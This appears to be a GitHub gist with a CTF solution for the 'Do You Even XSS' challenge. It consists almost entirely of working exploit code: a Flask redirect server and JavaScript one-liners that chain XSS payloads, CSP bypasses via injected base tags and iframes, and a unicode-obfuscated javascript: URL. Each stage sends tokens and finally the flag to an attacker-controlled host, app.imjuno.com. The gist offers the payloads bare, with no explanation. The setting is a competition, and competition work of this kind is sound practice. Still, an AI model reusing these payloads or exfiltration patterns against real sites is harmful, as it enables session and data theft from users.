Skip to content

Instantly share code, notes, and snippets.

@junorouse
Created October 24, 2019 16:52
Show Gist options
  • Save junorouse/311de1980d1c15d9dfd547361762527e to your computer and use it in GitHub Desktop.
Save junorouse/311de1980d1c15d9dfd547361762527e to your computer and use it in GitHub Desktop.
Do You Even XSS Payload
location='http://app.imjuno.com:500/stage5/'+token;
from flask import Flask, redirect
app = Flask(__name__)
import time
@app.route('/stage0/<token>')
def stage0(token):
print 'stage0: ', token
return redirect('''//stage1.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&tooltip=asdf</asdf><div%20data-ot-show-on="creation"%20data-ot="yes"%20id=asdf%20title="<script>window.name=`<img src=1 onerror=%26quot;location=\'http://app.imjuno.com:500/stage2/\'%2btoken%26quot;>`;location='//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token='%2btoken%2b'%26hint=%26quot;><script>$(name)\\x3c/script>'</script>">helloasdfasdfasdf</div>#asdf'''.format(token=token), code=301)
@app.route('/stage1/<token>')
def stage1(token):
print 'stage1: ', token
out = '''<html><body><script>window.name=`<img src=1 onerror="location=\'http://app.imjuno.com:500/stage2/\'+token">`;
location=\'/stage1_redirect/{token}\';
</script></body></html>'''.format(token=token)
# print out
return out
@app.route('/stage1_redirect/<token>')
def stage1_redirect(token):
return redirect('''//stage2.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&hint="><script>$(name)</script>'''.format(token=token, code=301))
@app.route('/stage2/<token>')
def stage2(token):
print 'stage2: ', token
return redirect('//stage3.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&cdn=app.imjuno.com;%20script-src-elem%20app.imjuno.com;%20<base%20href="//app.imjuno.com"><script%20src="/hacklu/stage3.js?aaaaaaa=333333333"></script>'.format(token=token), code=301)
@app.route('/stage3/<token>')
def stage3(token):
print 'stage3: ', token
return redirect('''//stage4.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&md=<img src="asdf%0a[^asdfasf]<iframe srcdoc='<script src=//app.imjuno.com/hacklu/stage4.js></script>asdf'></iframe>d%0a[^asdfasf]: ddd<>%0aasdf">'''.format(token=token), 301)
@app.route('/stage4/<token>')
def stage4(token):
print 'stage4: ', token
return redirect('''//stage5.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&homepage=%3Cbase%20href=%22//app.imjuno.com/hacklu/%22%3E'''.format(token=token), 301)
@app.route('/stage5/<token>')
def stage5(token):
print 'stage5: ', token
return redirect('''//stage6.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&radius=42143%27;location=%27\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075\u0074\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0070\u0070\u002e\u0069\u006d\u006a\u0075\u006e\u006f\u002e\u0063\u006f\u006d\u003a\u0035\u0030\u0030\u002f\u0073\u0074\u0061\u0067\u0065\u0036\u002f\u0022\u002b\u0074\u006f\u006b\u0065\u006e\u003b\u007d\u002c\u0020\u0031\u0029\u003b'''.format(token=token), 301)
return 'nice'
@app.route('/stage6/<token>')
def stage6(token):
print 'stage6: ', token
return redirect('//flag.doyouevenxss.fluxfingersforfuture.fluxfingers.net/?token={token}&youDidIt=location=%27http://app.imjuno.com:500/flag/%27%2bwindow.flag;'.format(token=token), 301)
@app.route('/flag/<flag>')
def stage_flag(flag):
print 'flag: ', flag
return 'nice'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=500)
location='http://app.imjuno.com:500/stage3/'+document.head.outerHTML.split('token = \'')[1].split('\'')[0];
location='http://app.imjuno.com:500/stage4/'+parent.parent.token;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment